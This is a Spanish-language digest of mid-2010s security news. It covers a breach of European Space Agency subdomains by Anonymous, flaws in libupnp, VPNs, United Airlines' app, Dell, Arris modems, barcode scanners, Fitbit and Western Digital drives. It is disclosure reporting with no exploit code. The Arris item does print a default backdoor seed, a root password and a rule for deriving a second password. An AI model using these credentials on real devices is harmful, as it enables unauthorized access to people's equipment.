Dominios de la Agencia Espacial Europea hackeados por Anonymous


El colectivo Anonymous ha atacado los subdominios de la página web de la Agencia Espacial Europea y filtrado información personal de los miles de suscriptores y funcionarios.

El colectivo de hacking Anonymous parece estar muy activo en este período, su última víctima es la Agencia Espacial Europea. Los miembros de Anonymous han hackeado varios subdominios de la página web de la Agencia Espacial Europea y filtrado credenciales personales y de ingreso de miles de suscriptores y funcionarios.
"We did it for the Lulz" (Lo hicimos para reir) es el mensaje dejado por Anonymous.


Anonymous llevó a cabo un ataque cibernético en los siguientes subdominios de la página web de la Agencia Espacial Europea (ESA):

due.esrin.esa.int
exploration.esa.int
sci.esa.int

Los hackers explotan una vulnerabilidad de Blind SQL con el fin de acceder al backend de los subdominios y exfiltrar datos de la base de datos.

Anonymous filtró los datos robados en tres archivos separados que incluyen la base de datos del sitio web, la información personal del personal y los datos de los suscriptores.

"El tercer archivo contiene los nombres, correos electrónicos y contraseñas en texto de 8000+ suscriptores. Los datos filtrados está disponible aquí → Base de Datos | Datos de Empleados | Datos de Suscriptores ".
Anonymous informó a HackRead el siguiente mensaje:

"PORQUE NAVIDAD SE ACERCA Y TENIAMOS QUE HACER ALGO PARA DIVERTIRNOS, ASI QUE LO HICIMOS POR LOS LULZ. (las risas)"

Parece que la parte del colectivo Anonymous que hackeó la Agencia Espacial Europea es la misma que irrumpió en las bases de datos de la Conferencia Climática de las Naciones Unidas (Cop21) y la Organización Mundial del Comercio.

Ese tipo de incidentes abre las puertas a nuevos ataques cibernéticos, los datos filtrados incluyen información relacionada con los funcionarios que podrían ser objetivo de grupos criminales o actores del Estado-nación para espionaje.

¿Utilizan una contraseña para todas sus cuentas?


computerworld.- Una encuesta realizada por Kaspersky Lab revela que muchas personas todavía no son lo suficientemente cuidadosas con sus contraseñas. De hecho, un 14% aún tiene una sola contraseña para todas las cuentas, poniendo así en riesgo todas sus cuentas.
El nivel de riesgo no es mucho menor para los que utilizan unas pocas contraseñas para un gran número de cuentas, un 36%, o los que usan variaciones del mismo patrón de contraseña, un 12%. Lo que complica aún más la situación es que, según otra encuesta de Kaspersky Lab, 1 de cada 10 usuarios utiliza contraseñas con menos de ocho caracteres de longitud, mientras que el 12% no trata de hacer sus contraseñas más difíciles de adivinar usando, por ejemplo, letras mayúsculas, números mezclados con letras, signos de puntuación u otros trucos similares.
Para empeorar las cosas, el estudio también revela que los usuarios tanto domésticos como profesionales están poniendo en riesgo la seguridad mediante el almacenamiento de sus contraseñas en lugares de fácil acceso o no seguros. El 57% admitieron que mantienen sus contraseñas en un papel, en sus teléfonos, en archivos de texto de sus equipos, o las guarda en el navegador. Y cuando el navegador ofrece guardar un inicio de sesión y contraseña, un 36% están dispuestos a aceptar, dejándolos así en manos de los ciberdelincuentes o personas deshonestas que pueden apoderarse de su dispositivo.
Esta actitud descuidada hacia las contraseñas puede explicarse por muchos usuarios están convencidos de que no tienen información confidencial almacenada en sus ordenadores. Esto es lo que cree el 27% de los encuestados, sin darse cuenta de que las contraseñas y nombres de usuario son en sí mismas son un objetivo favorito de los cibercriminales. Además, un estudio más reciente de Kaspersky Lab mostró que el 73% de los usuarios prefiere revelar sus contraseñas que ir sin ropa interior. Como resultado, un alarmante 25% de los usuarios encuestados han tenido sus cuentas secuestradas en el último año.

Millones de dispositivos inteligentes bajo riesgo por falla de 3 años de antigüedad


Según Trend Micro hasta 6,1 millones de dispositivos inteligentes, incluyendo televisores inteligentes y routers no han arreglado una vulnerabilidad de software que data del 2012.


Millones de televisores inteligentes, routers y teléfonos están en riesgo debido a la presencia de una vulnerabilidad de 3 años de edad en un software que utilizan. Según los expertos de Trend Micro, el fallo de seguridad no ha sido arreglado por muchos vendedores a pesar de la disponibilidad de un parche desde el 2012.
"Un total de 6,1 millones de dispositivos - teléfonos inteligentes, routers, televisores inteligentes - estan actualmente en riesgo a ataques de ejecución de código remoto, debido a vulnerabilidades que han sido corregidas desde el 2012." escribió Veo Zhang, analista de amenazas móviles en Trend Micro. "Existen vulnerabilidades en el SDK portátil para dispositivos UPnP ™, también llamado libupnp. Esta biblioteca particular, se utiliza para implementar la reproducción de medios (DLNA) o NAT transversal (UPnP IGD). Las aplicaciones en un smartphone pueden utilizar estas funciones para reproducir archivos multimedia o conectarse a otros dispositivos dentro de la red principal de un usuario ".

Trend Micro descubrió 547 aplicaciones que utilizan una versión sin parches del componente de software, 326 están disponibles en la tienda de aplicaciones de Google Play y la mayoría de las aplicaciones son muy populares y son utilizadas por millones de usuarios. Una de las aplicaciones afectadas es QQMusic que se distribuye por Tencent, la compañía lanzó rápidamente una actualización para la aplicación de Android el 23 de noviembre después de la divulgación de la noticia.


"Estas son aplicaciones muy populares y pusieron a millones de usuarios en peligro; aparte de los dispositivos móviles, routers y televisores inteligentes siguen en riesgo" agregó.

Los expertos de Trend Micro confirmaron que los ciberdelincuentes ya están atacando estos dispositivos vulnerables, explotando las fallas estos podrían tomar el control completo del sistema de destino.


Una vez identificado un dispositivo vulnerable, un atacante puede enviar un paquete especialmente diseñado para provocar un desbordamiento de búfer. En el código de abajo, el búfer TempBuf puede desbordarse y colgarse.
"Con más investigación un exploit podría no sólo utilizarse para causar que se cuelgue el equipo destino, pero para ejecutar código arbitrario en un dispositivo afectado. La capacidad de ejecutar código arbitrario daría al atacante la capacidad de tomar el control del dispositivo, como en un PC ". Continúa el escrito. "Hemos visto exploits en internet abusando de equipos que no utilizan protecciones de mitigación tales como canaries stack, DEP y ASLR. Para los sistemas bien protegidos, no conocemos exploits que actualmente sean capaces de ejecución remota de código ".

La vulnerabilidad de la seguridad afecta a la biblioteca 'libupnp' de código dentro del SDK portátil para dispositivos UPnP, se utiliza para la reproducción de los medios de comunicación y también para funcionalidades NAT.

A continuación una lista de las aplicaciones más populares afectadas:

Nombre Nombre del Paquete
AirSmartPlayer com.gk.airsmart.main
Big2Small com.alitech.dvbtoip
CameraAccess plus jp.co.pixela.cameraaccessplus
G-MScreen mktvsmart.screen
HexLink Remote (TV client) hihex.sbrc.services
HexLink-SmartTV remote control com.hihex.hexlink
Hisense Android TV Remote com.hisense.commonremote
Netflix com.netflix.mediaclient
nScreen Mirroring for Samsung com.ht.nscreen.mirroring
Ooredoo TV Oman com.ooredootv.ooredoo
PictPrint – WiFi Print App – jp.co.tandem.pictprint
Mozaic GO qa.MozaicGO.Android
QQMusic com.tencent.qqmusic
QQ音乐HD com.tencent.qqmusicpad
Smart TV Remote com.hisense.common
Wifi Entertainment com.infogo.entertainment.wifi
モバイルTV(StationTV) jp.pixela.px01.stationtv.localtuner.full.app
에브리온TV (무료 실시간 TV) com.everyontv
多屏看看 com.letv.smartControl
海信分享 com.hisense.hishare.hall

La despedida de Flash ya esta en marcha


Si hay algo en lo que los profesionales de la seguridad estan de acuerdo es en esto, su odio por Flash Player de Adobe. No hay APT o exploit kit que no haya acogido las vulnerabilidades de la plataforma de desarrollo con los brazos abiertos. Y por todos los daños contabilizados en objetos perdidos, propiedad intelectual, secretos industriales, contraseñas robadas y números de tarjetas de crédito, ha habido una llamada igualmente apasionada por la industria de la tecnología para deshacerse de Flash de raíz.
"Flash es un realmente un fantástico ejemplo de lo que sucede cuando tienes un código heredado dentro de una aplicación que ha existido desde hace mucho tiempo", dijo Cody Pierce, director de investigación de vulnerabilidad y prevención en Endgame. "Flash proporciona una rica experiencia de desarrollo para los usuarios, sin embargo, sufre porque está tratando de ser una plataforma rica. Cada vez que hace eso y tiene que soportar formatos de archivos heredados, terminan en una situación en la que los atacantes tienen un campo de ataque casi ilimitado: video, audio, imágenes, diferentes protocolos y un muy rico lenguaje de programación en ActionScript. Es propicio para la explotación y el descubrimiento de la vulnerabilidad ".

Adobe esta semana tomó uno de sus primeros pasos fuera de Flash y hacia HTML5. La compañía anunció que ha cambiado el nombre de Flash Professional CC a Animate CC, que estará disponible a principios del próximo año, y que se considere herramienta preferida de Adobe para desarrollar contenido HTML5.

"Nuestros clientes claramente han comunicado que les gustaría que nuestras aplicaciones creativas evolucionen para soportar múltiples estándares y estamos comprometidos a hacer eso", dijo Adobe al anunciar la movida.

Adobe no tiro por completo a Flash en el cesto de la basura y dijo que continuará desarrollando actualizaciones de seguridad y características de Flash y seguirá trabajando con sus socios de navegadores como Microsoft, Mozilla y Google para disminuir los riesgos que rodean a flash. Por no hablar de que demasiadas aplicaciones heredadas y contenido web existente se basan en Flash como para descontinuar de manera inmediata, dijeron los expertos.

"El mensaje clave es que esto no va a desaparecer pronto", dijo Mike Hanley, director del programa de R&D y de Duo Security. "A lo mejor, este es un reconocimiento de que hay un futuro en el flash ya no será una plataforma dominante en la web, pero sin calendario claro u horario de desaprobación planeado, muchas aplicaciones heredadas y contenido web seguirá confiando en plataformas históricamente problemáticas como Flash para obtener la más amplia adopción posible en los próximos años ".
Flash sigue atrayendo a lo peor de los peores hackers. Mes tras mes, en las actualizaciones de seguridad programadas, Adobe lanza docenas de parches para Flash, sin mencionar un número creciente de actualizaciones emergentes que fijan vulnerabilidades de día cero. Este año cayó a un punto bajo este verano cuando fue descubierto entre los restos del hackeo al Hacking Team que la controvertida empresa de vigilancia tenía a su disposición una serie de vulnerabilidades dia cero que estaba usando y no había reportado a Adobe.

Hacking Team no está solo en la codicia de días cero en Flash. Zerodium, la nueva empresa se inició en septiembre por el fundador de VUPEN Chaouki Bekrar publicó recientemente su gráfico de precios, lo que mostró que pagaría entre $ 50.000 y $ 80.000 por días cero en Flash.

"Con un gran número de usuarios aún ejecutando aplicaciones vulnerables, proporciona a los atacantes con un vector de intrusiones versátil", dijo Nick Buchholz, analista de seguridad de la red principal en Damballa. "Seguramente continuaremos viendo el desarrollo de exploits de flash mucho después del anuncio, y la demanda de las exploits probablemente se mantendrán sin cambios."

Aunque Adobe continúa luchando la buena batalla, Google y Mozilla ya han hecho movimientos para negar a los exploits la capacidad de cargar automáticamente y ejecutarse a través de plugins click-to-play para Chrome y Mozilla.

"El impulso para dejar de usar flash probablemente provenga de otras compañías y grupos de trabajo cuyos usuarios con más frecuencia son explotados a través de la plataforma Flash," dijo Hanley de Duo Security.

Mientras tanto, esperen que los hackers aficionados a la explotación de programas multiplataforma como Flash y Java sigan trabajando, donde exploits se pueden escribir una vez e ir ajustando para trabajar en varios ámbitos, entre ellos la incorporación de objetos Flash maliciosos dentro de un documento de Microsoft Office que se pueden entregar a través de phishing o correos electrónicos de spam.

"Yo creo que Flash es un objetivo atractivo con los atacantes, porque de este cross-browser, soporte multiplataforma", dijo Craig Young, investigador de seguridad de Tripwire. "La capacidad de ejecutar código en sistemas cliente es un vector enorme de ataque como vemos con Java, ActiveX y JavaScript. Tradicionalmente Flash ha sido frecuente a través de múltiples navegadores en varias plataformas permitiendo así una explotación más eficaz.

"Mi expectativa es que habrá una gran base de instalaciones de Flash durante muchos años por venir y, como tal, seguirá siendo una espina en la seguridad de los equipos", dijo Young. "Yo espero que algunos sitios y servicios van a reemplazar rápidamente de Flash con contenido HTML5, pero Flash seguirá siendo un vector de ataque viable mientras que los navegadores web más populares sigan soportandolo."

Vulnerabilidad expone la dirección real de usuarios de VPN


spain-noticias.- Una vulnerabilidad en cómo los proveedores de VPN tratan con el reenvío de puertos expone la dirección IP real de algunos usuarios.

Según su investigación, se deben cumplir algunas condiciones para que esto suceda, pero ninguno de ellos es tan fuera de lo común como para que los atacantes no puedan fácilmente satisfacerlas.

Se necesitan condiciones especiales para el ataque.

En primer lugar, el proveedor de VPN debe permitir a los usuarios activar el reenvío de puertos en su cuenta VPN, lo que la mayoría lo hace. Sólo el atacante debe habilitar la función de reenvío de puertos, no la víctima.
El atacante debe conocer la dirección IP de salida de la víctima, que puede ser fácilmente adquiridos a través de IRC públicas, las conexiones de torrents, o engañando al usuario para acceder a un sitio web bajo el control del atacante.

La última condición es que el atacante debe configurar una cuenta de VPN en el mismo proveedor como la víctima, que es fácilmente factible si el atacante conoce la dirección IP de salida.

El ataque es posible debido a un problema con la tabla de enrutamiento interno de la VPN. Si el atacante puede hacer que el acceso a la víctima un recurso (imagen incrustada en un sitio) alojado en el mismo servidor VPN, debido a la tabla de enrutamiento interna y el ajuste de reenvío de puerto, el atacante puede obtener la dirección IP real de la víctima.
Perfecto Privacidad dice que probó este supuesto de un ataque con nueve de los mayores proveedores de VPN de hoy en día, y cinco de ellos eran vulnerables. Ellos fueron notificados de la cuestión para que puedan empezar a trabajar en los arreglos.

Cuestiones de reenvío de puertos afectan a todos los protocolos VPN

Debido a que el tema funciona en el nivel de red más bajo del modelo OSI, protocolos VPN como OpenVPN, PPTP o IPSec son inherentemente afectados.
Perfecto Privacidad recomienda que los proveedores de VPN utilicen varias direcciones IP y permitan conexiones entrantes a IP1 para salir de conexiones a través de IP2-IPx, al tiempo que el reenvío de puertos en IP2-IPx, no IP1. Básicamente, se debe utilizar una IP-Man-in-the-Middle para las operaciones de reenvío de puertos.

Además, los proveedores de VPN también deben utilizar un servidor de seguridad de servidor para bloquear el acceso de IP real de un cliente a cualquier conexión de puerto de reenvío que no es el suyo.

Puesto que hay cientos de proveedores de VPN en línea, muchos de ellos están obligados a ser afectados por este problema.

United Airlines lenta para arreglar vulnerabilidad critica en su aplicación móvil


Una vulnerabilidad reportada a United Airlines que podrían haber sido explotada para manipular reservaciones de vuelo y datos del cliente permaneció sin parche durante casi seis meses antes de que se arreglara hace 10 días.

El investigador Randy Westergren encontró y reportó un problema en la aplicación móvil de United Airlines en mayo, poco después de que la aerolínea anunciara su programa de recompensas de errores, el primero en su sector. Un parche, sin embargo, llegó sólo después de seis meses de ida y vuelta entre la aerolínea y Westergren prometiendo revelar el problema y alertar con una publicación tecnológica.

La vulnerabilidad se encuentra en la API de los equipos que exponía información personal de cualquier miembro del programa de viajero frecuente de United MileagePlus. Westergren dijo que su ataque implicó la creación de una cuenta, reservar un vuelo y examinar solicitudes de la aplicación. Vio que podía cambiar un parámetro en particular, mpNumber, y recibir información de contacto y vuelo para cualquier miembro de MileagePlus.
"La vulnerabilidad permite esencialmente a un atacante especificar el número de MileagePlus durante la petición de que obtiene los próximos vuelos. Esto significa que uno podría estar conectado a su propia cuenta, pero Solicitar a los detalles de otra cuenta ", dijo Westergren.

"Aunque los números de MileagePlus no eran secuenciales, parecían seguir un formato predecible", dijo. "Un amplio ataque incluiría adivinar el mpNumber y hacer una petición al end point vulnerable. Un ataque dirigido simplemente requiere que un atacante sepa el mpNumber de la víctima ".

La vulnerabilidad se conoce como una vulnerabilidad de referencia de objeto indirecto, poniendo en peligro los datos referenciados por el parámetro. Las respuestas devuelven los datos recordLocator junto con el apellido del cliente, información suficiente Westergren dijo, para permitir un ataque de gestionar cualquier reservación de vuelo.

"Esto incluye el acceso a todas las salidas del vuelo, llegadas, el recibo de pago de la reservación (forma de pago y los últimos 4 dígitos de la tarjeta de crédito), información personal sobre los pasajeros (números de teléfono, contactos de emergencia), y la capacidad de cambiar/cancelar el vuelo" escribió en un blog explicando la situación.

A mediados de julio, Westergren fue informado que el problema ya había sido reportado y por lo tanto no era elegible para una recompensa. No obstante, Westergren continuó presionando a United para un parche sólo para que la aerolínea respondiera que sólo quien la reporto originalmente recibiría actualizaciones.
Posteriormente United validó la vulnerabilidad en agosto y septiembre, dijo que estaba "en cola" para ser reparada. Pero para el 5 de noviembre, la vulnerabilidad aún no había sido arreglada y Westergren informo a United de su intención de divulgarla el 28 de noviembre, seis meses después de la divulgación inicial. United respondió que estaba inundado con reportes de su programa y recordó que realizar una revelación pública lo descalificaría permanentemente, quien luego fue a un contacto de los medios de comunicación con la historia y sólo entonces, dijo, después contactar a United con la publicación, el parche fue acelerado.

"Se me informó de que el error era una presentación por duplicado. La política de United es de otorgar sólo al primer presentador (esto es bastante estándar para los programas de recompensas) ", dijo Westergren. "United no me comprobó que así fuera, ni tampoco creo que estuviera bajo ninguna obligación de hacerlo."

Westergren no es ajeno a descubrir vulnerabilidades en aplicaciones web y móviles. Ha sido acreditado con la búsqueda de errores en software de automatización del hogar Z-Way, aplicación de Marriott Android móvil, aplicación móvil MyFIOS de Verizon , y la aplicación móvil de fitness Pal MyFitness. Él dijo que esto no era su primer experiencia negativa con un proveedor en divulgación de errores, aunque era la primera dificultad que ha tenido con una recompensa de errores.

"El hecho de que había un programa de recompensas de errores involucrada, al menos desde mi punto de vista, era en gran medida irrelevante - incluyendo la recompensa. Tengo la misma responsabilidad con todas las relaciones de los proveedores, independientemente de la existencia de un programa de recompensas de errores ", dijo Westergren. "Dicho esto, creo que las recompensas por errores son positivas en general para la comunidad de seguridad - esta experiencia no cambia eso para mí."

Más información en su blog.

Falla de seguridad en equipos Dell desde Agosto/2015


ticbeat.- Desde el pasado mes de agosto, algunos modelos de PC del fabricante Dell incluyen un fallo de fábrica que permitiría a los hackers interceptar el tráfico encriptado que desde ellos se haga en la red. Así lo asegura Joe Nord, un investigador especializado en ciberseguridad, que fue el encargado de poner de relieve este problema el domingo.
Dell, que ha pedido disculpas y ha anunciado que trabaja en un parche de seguridad para resolver el problema que, previsiblemente, estará disponible en las próximas horas, explica que el origen del fallo está en un certificado que ha sido instalado en los ordenadores para verificar su identidad durante las sesiones de soporte técnico. Parece que un hacker o un ciberdelincuente lo suficientemente hábil podría utilizar este mismo certificado para crear una clave que le permitiera espiar los datos encriptados del ordenador.

Lee también: Computadoras Lenovo cargadas con adware man-in-the-middle que rompe HTTPS

Dell justifica esta decisión explicando que lo que pretendía era facilitar que los usuarios verificasen la identidad de sus ordenadores cuando solicitasen ayuda o servicio técnico. Sin embargo, en su blog, el experto Joe Nord asegura que, cuando descubrió la presencia de este certificado en su Dell Inspiron 5000 estuvo “un buen rato” buscando una explicación para ello. De hecho, Nord establece un paralelismo con otro error similar, en este caso el que cometió a principios de este mismo año el fabricante chino Lenovo cuando decidió instalar de serie en sus equipos el software conocido como Superfish. Al igual que el certificado ‘eDellRoot’ de Dell, el certificado de seguridad de Superfish permitía a terceros hacerse con los datos encriptados de navegación de los usuarios afectados. Nord lo calificó entonces como “un suicidio corporativo”, y Lenovo tuvo que pedir disculpas y dejar de preinstalar este programa en sus ordenadores.
Los portavoces de Dell se han esforzado en aclarar que este certificado no constituye, en ningún caso, adware o malware, ni ha sido diseñado para recoger información de sus usuarios, sino para atenderles con mayor velocidad, pero aun así la compañía ya ha publicado un post en el que explica con detalle a sus usuarios cómo pueden desinstalarlo de sus equipos. Además, existe una web que permite a quienes utilicen un equipo Dell comprobar si está afectado por este bug.

Backdoor Dentro de un Backdoor Identificado en 600.000 Módems Arris


Miles de cable módems fabricados por la empresa de telecomunicaciones con sede en Georgia, Arris sufren de una serie de problemas: vulnerabilidades XSS y CSRF, contraseñas grabadas en memoria, y lo que un investigador está llamando una puerta trasera dentro de una puerta trasera.

El investigador brasileño Bernardo Rodrigues se encontro con los problemas desde hace varios meses mientras investigaba la seguridad de los cable módems para una conferencia de seguridad y las dio a conocer la semana pasada.

Según los informes los módems contienen una biblioteca no documentada que actúa como una puerta trasera, a su vez, lo que permite conexiones privilegiadas utilizando una contraseña personalizada.
Tras una búsqueda en Shodan, Rodrigues estima que más de 600.000 equipos de acceso externo son vulnerables a esta puerta trasera y que los módems TG862A, TG860A y DG860A se ven afectados.

Una puerta trasera ya se conocía desde hace tiempo, por lo menos desde el 2009, y se basa en un algoritmo conocido públicamente. Para explotarlo un atacante tendría que estar familiarizado con el algoritmo, la fecha, y la semilla para tener acceso al dispositivo. Rodrigues dice que hay un generador de "contraseña del día" que utiliza una semilla codificada DES para establecer una contraseña a diario, pero se basa en una semilla por defecto, MPSJKMDHAI.

Una vez dentro, un atacante podría "activar Telnet y SSH de forma remota a través de la interfaz de administración HTTP oculta", o mediante un MIB de SNMP.
"La contraseña predeterminada para el usuario SSH 'root' es "arris". Cuando accede a la sesión de telnet o autentica a través de SSH, el sistema genera un shell 'mini_cli' pidiendo la contraseña de puerta trasera ", Rodrigues escribió en su divulgación la semana pasada.

La terminal proporcionada por el generador de "password del día" se puede escapar y utilizar una contraseña escrita en el módem - los últimos cinco dígitos del número de serie del dispositivo.

"Iniciar de sesión como técnico con el 'password del día' proporciona una terminal mini_cli restringida. Esta cubierta puede ser escapada a una terminal BusyBox completa; iniciando sesión utilizando la contraseña codificada proporcionada por la shell BusyBox," lee un aviso sobre el tema publicado por el CERT/CC," Se ha informado de que estas vulnerabilidades, particularmente las contraseñas no modificables, están siendo explotadas actualmente ".

Aparte de la puerta trasera y la contraseña codificada, la advertencia del CERT/CC afirma que ciertos parámetros en la interfaz de administración web de los modems 'también son vulnerables a ambas vulnerabilidades cross-site scripting (XSS) y vulnerabilidades de falsificación de solicitud cross-site (CSRF).

Rodrigues dijo que Arris fue menos receptivo cuando se informó por primera vez los defectos, pero que CERT/CC demostró ser útil y ayudo en atraer la atención de la compañía.

Cuando se le solicito a un portavoz de la empresa información al respecto, comento que Arris estaba "trabajando día y noche en las actualizaciones de módem" para hacer frente a la vulnerabilidad, pero insistió en que cualquier riesgo asociado a la vulnerabilidad, mientras tanto, es baja y que la empresa no tenía conocimiento de ningún exploit relacionado con ello.

BadBarCode: Hackers usan códigos de barras maliciosos


La omnipresencia de los códigos de barras en las tiendas, hospitales y otras industrias de servicios es indiscutible, a pesar de eso, los hackers no habían prestado mucha atención a estas pequeñas líneas de datos.

Pero al igual que otras tecnologías de apoyo a la llamada Internet de las cosas, estan propensas a vulnerabilidades asi como a ser analizadas por hackers de sombrero blanco y sombrero negros.

El caso en cuestión se dio en la Conferencia PanSec 2015 de esta semana en Tokio, donde los investigadores del Laboratorio Xuanwu de Tencent demostraron una serie de ataques con códigos de barras escaneados envenenados por numerosos escáneres de códigos de barras de teclado para abrir un shell en una máquina y prácticamente escribir comandos de control. El ataque, apodado BadBarcode, es relativamente fácil de llevar a cabo, y los investigadores detrás del proyecto dicen que es difícil determinar si los escáneres o los equipos de computo deben ser parchados, o ambos, o ninguno.
"No sabemos lo que los chicos malos pueden hacer. BadBarcode puede ejecutar cualquier comando en el sistema host, o [implante] un troyano ", dijo Yang Yu, quien colaboró ​​con su colega HyperChem Ma. Yu, el año pasado, fue recompensado con un pago de $ 100,000 de Mitigación Bypass Bounty de Microsoft para un trío derivaciones de ASLR y DEP . "Así que, básicamente, se puede hacer cualquier cosa con BadBarcode."

Yu dijo que su equipo fue capaz de explotar el hecho de que la mayoría de los códigos de barras no contienen sólo caracteres numéricos y alfanuméricos, sino también caracteres ASCII completo, dependiendo del protocolo que se utiliza. Los escáneres de código de barras, por su parte, son esencialmente emuladores de teclado y si son compatibles con protocolos como Code128 que soportan caracteres de control ASCII, un atacante podría crear un código de barras que se lee y abre un shell en el equipo al que se envían los comandos.

Yu y Ma dijeron durante su presentación que comandos Ctrl + mapa para código ASCII puede utilizarse para activar teclas de acceso rápido, que registraron con el prefijo Ctrl +, para iniciar diálogos comunes como OpenFile, SaveFile, PrintDialog. Un atacante podría utilizar estas teclas de acceso rápido para navegar el sistema de archivos del equipo, lanzar un navegador, o ejecutar programas.

"Hemos diseñado varios ataques diferentes," dijo Yu. "El principio clave es poner caracteres especiales de control en el código de barras, de modo que el lector de código de barras active teclas de acceso rápido del sistema y active alguna función determinada. Hacer un BadBarcode exploit es fácil. Sólo tiene que generar algunos códigos de barras maliciosos e imprimirlos en papel ".
La solución para este problema es complicada, dijo Yu, porque no se limita a los escáneres de fabricantes en particular, por ejemplo, los fabricados por proveedores que incluyen Esky, Symbol, Honeywell y TaoTronics.
"BadBarcode no es una vulnerabilidad de un determinado producto", dijo Yu. "Afecta a la totalidad de las industrias relacionadas con el escáner de código de barras-. Es incluso difícil decir si BadBarcode afecta a los escáneres o a las computadoras. Así que cuando descubrimos BadBarcode, no sabíamos qué fabricante debía ser informado ".

Yu sugiere que los fabricantes de escáner de código de barras no permitan funciones adicionales más allá de los protocolos estándar por defecto, ni deben transmitir los caracteres de control ASCII para el dispositivo host por defecto. Los equipos en los entornos de la IO, por su parte, deben pensar dos veces acerca del uso de escáneres de código de barras que emulan teclados, y deben desactivar las teclas de acceso rápido del sistema, dijo Yu.

Hackea pulseras Fitbit en 10 segundos de forma inalámbrica


Una vulnerabilidad en las pulseras de actividad FitBit se reportó al fabricante el pasado mes de marzo, y todavía podría ser explotada por la persona que se sienta a tu lado en el parque mientras recuperas el aliento. Lo cierto es que este tipo de wearables son vulnerables por sus puertos Bluetooth según se recoge en The Register. El ataque es muy rápido, y se puede extender a ordenadores a los que se conecte la FitBit infectada.

Este tipo de ataques por Bluetooth requieren que un atacante se encuentre a pocos metros de un dispositivo objetivo. El malware se puede entregar diez segundos después de que los dispositivos se conecten, haciendo que la proximidad, aunque sea fugaz, sea un problema. Las pruebas que se han conducido para comprobar el éxito del hack tardan hasta un minuto en conseguirse, aunque no es necesario para comprometer el dispositivo.
Según la fuente, el investigador de Fortinet Axelle Apvrille comentó que este procedimiento, conocido como full persistence, significa en este caso que no importa si se reinicia la FitBit: cualquier ordenador que se conecte con ella se puede infectar con una puerta trasera, un troyano o cualquier malware que escoja el atacante.

El primer malware para wearables de fitness

Efectivamente, este es el primer malware que se ha conseguido entregar de forma viable en pulseras de actividad. Los vectores del ataque todavía siguen presentes, y como ya comentamos al principio del artículo Apvrille avisó a FitBit el pasado mes de marzo. La respuesta de la empresa fue considerarlo como un bug que se corregirá con el tiempo. No debemos olvidar que Apvrille es una investigadora de malware de bastante prestigio, y ya existe un vídeo de demostración de sus descubrimientos que puedes ver a continuación:


Axelle Apvrille tiene otros interesantes descubrimientos sobre este hack, como por ejemplo manipular el número de pasos dados en una FitBit y la distancia recorrida, que después se usan para ganar premios que ofrecen descuentos en productos de la marca. La investigadora ha usado ingeniería inversa para enviar 24 mensajes trucados a la pulsera y 20 al dongle Bluetooth de la misma. El trabajo ha sido muy arduo, ya que los dispositivos no ofrecen su código al público y no vienen con documentación del software interno.
Apvrille descubrió que la comunicación se realiza a través de XML y Bluetooth Low Energy mientras que el cifrado y el descifrado se realizan en el wearable y no en el dongle, que se considera “fuera de los límites de seguridad”. Las comunicaciones y los sets de datos se dividen en “megavolcados” que incluyen los pasos que se dan cada día e información de la actividad del usuario, y “microvolcados” que tienen que ver con “emparejar” el wearable con un teléfono on un PC, respuestas del servidor e identificadores de dispositivo.

El trabajo de la investigadora añade nueva información del software a bajo nivel en FitBit a un repositorio que habían comenzado otros compañeros suyos.


No es el primer agujero de FitBit

En 2013 otro grupo de investigadores de seguridad pudieron acceder a cuentas de FitBit con un login falso gracias a comprobaciones de autenticación muy laxas, lo que permitía a los atacantes ganar premios. Sin embargo, fue mucho peor otro agujero de 2011, en el que se expusieron al público las actividades sexuales de los usuarios, en las que se revelaba si habían tenido una “actividad vigorosa” o por el contrario otra “pasiva y suave”.

Hay otros hacks bastante “tontos” que permiten que los más vagos puedan inducir a los sensores que se está realizando una actividad. En 2013 varios investigadores ataron pulseras FitBit a la rueda de un coche y condujeron a 16 kilómetros por hora para simular actividad física.

Académicos encuentran fallas críticas en unidades de hardware con autocifrado


Algunos discos duros externos de autocifrado de grado de consumo están llenos de vulnerabilidades de seguridad que hacen que su cifrado sea irrelevante.

Un documento oficial publicado a finales de septiembre tomo un número de unidades fabricadas por Western Digital que sufren de defectos que son triviales para explotar y poner todos los datos almacenados en el hardware en riesgo.

Se estudiaron seis modelos de hardware y los investigadores fueron capaces de descubrir fugas de llaves que facilitan ataques de contraseña de fuerza bruta, descubrir llaves almacenadas en el dispositivo que permiten pasar por alto cualquier seguridad nativa, extraer y reemplazar firmware y también se encontraron puertas traseras completas en los dispositivos.

Western Digital no respondió a una solicitud de comentarios hasta el momento de esta publicacion.

El documento "got HW crypto? On the (in)security of a Self-Encrypting Drive series" por Gunnar Alendal, Christian Cisón, y modg, describe los problemas que exponen llaves de cifrado para atacar sin necesidad de autenticación, como la contraseña que abre la unidad una vez que está encriptada. La mayor parte de las unidades probadas fueron fabricados entre 2007 y 2013 y los investigadores dijeron en el documento que ninguna de las unidades había sido parchada.
El documento también se centra en los modelos USB de las unidades My Passport construidas por Western Digital; los dispositivos también pueden conectarse a través de Thunderbolt o Firewire. En la mayoría de los modelos My Passport examinados en este documento, el cifrado y descifrado se realiza por el puente que conecta el host a través de USB a la interfaz SATA de la unidad externa, dijeron los investigadores. El acceso a la interfaz está bloqueada hasta que se introduzca una contraseña, por ejemplo. En los nuevos modelos, según el documento, ese paradigma ha cambiado y el cifrado/descifrado se realiza en el controlador SATA. El documento explica que la contraseña del usuario genera una llave que protege la llave que guarda los datos de la unidad.

Estas llaves son configuradas de fábrica, sin embargo, el uso de un generador de números aleatorios inseguro que se alimenta con la hora actual del equipo, reduce la protección de la unidad de 256 bits de seguridad a 32 bits.

"Eso significa que son trillones y trillones de veces más fácil de romper de lo que deberían ser, y en la práctica, un atacante con una computadora portátil puede ser capaz de descifrar la llave y desencriptar totalmente el disco", dijo Matthew Green, experto en criptografía y profesor en la Universidad Johns Hopkins University.

El documento menciona que Western Digital parchado este tema del RNG en mayo de 2014, pero los investigadores no fueron capaces de encontrar la solución en las notas de la versión.
"Como el software de desbloqueo, que se encuentra en el VCD [CD virtual] para todos los MP [My Passport], tiene la capacidad de borrar la unidad, esta vulnerabilidad estará todavía presente hasta que se parchen los VCD", escribieron los investigadores.

Además, la llave generada por la contraseña del usuario se almacena en el dispositivo, y si bien esto es problemático, el problema con el RNG hace que la unidad sea insegura mucho antes de que se requiera la contraseña.

El documento cubre todos los fallos de seguridad descubiertos para múltiples versiones de unidades My Passport y los distintos puentes USB de diferentes fabricantes integrados en ellos. En algunos modelos, por ejemplo, los investigadores fueron capaces de engañar al puente USB para entrar en modo de descarga y aceptar la actualización del firmware de un atacante, por ejemplo. Esto abre la puerta para cualquier número de ataques, incluyendo ataques Maid Evil donde un portátil desatendido en una habitación de hotel, o un portátil confiscado en un cruce fronterizo, por ejemplo, podrían ser atacados.

